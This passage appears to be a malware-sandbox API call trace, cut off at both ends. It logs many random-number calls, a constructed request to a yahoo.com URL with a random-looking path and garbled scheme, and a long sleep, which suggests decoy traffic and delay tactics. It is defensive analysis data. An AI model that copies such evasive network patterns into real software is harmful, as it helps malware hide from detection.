0x7ffc5bcc36b0 [0264.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.503] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.503] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.503] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b277, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a1b277) returned 0x0 [0264.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.513] GetProcessHeap () returned 0x440000 [0264.514] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0264.514] lstrcpyA (in: lpString1=0x4726f0, lpString2="%xíTs://www.yahoo.com" | out: lpString1="%xíTs://www.yahoo.com") returned="%xíTs://www.yahoo.com" [0264.514] lstrcatA (in: lpString1="%xíTs://www.yahoo.com", lpString2="/0pfohvb4vRra6osecfpm5ppfaFUdk9sSDx51x/k35uuu231we16W6hcob8Tqagex4f2utdnh/" | out: lpString1="%xíTs://www.yahoo.com/0pfohvb4vRra6osecfpm5ppfaFUdk9sSDx51x/k35uuu231we16W6hcob8Tqagex4f2utdnh/") returned="%xíTs://www.yahoo.com/0pfohvb4vRra6osecfpm5ppfaFUdk9sSDx51x/k35uuu231we16W6hcob8Tqagex4f2utdnh/" [0264.514] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0264.514] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="%xíTs://www.yahoo.com/0pfohvb4vRra6osecfpm5ppfaFUdk9sSDx51x/k35uuu231we16W6hcob8Tqagex4f2utdnh/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0264.514] GetProcessHeap () returned 0x440000 [0264.514] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0264.514] GetProcessHeap () returned 0x440000 [0264.514] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0264.514] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0264.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0264.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0264.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0264.515] Sleep (dwMilliseconds=0x182fb) [0264.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0264.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.675] GetProcessHeap () returned 0x440000 [0264.675] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02350 [0264.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02351, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a02351) returned 0x0 [0264.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, 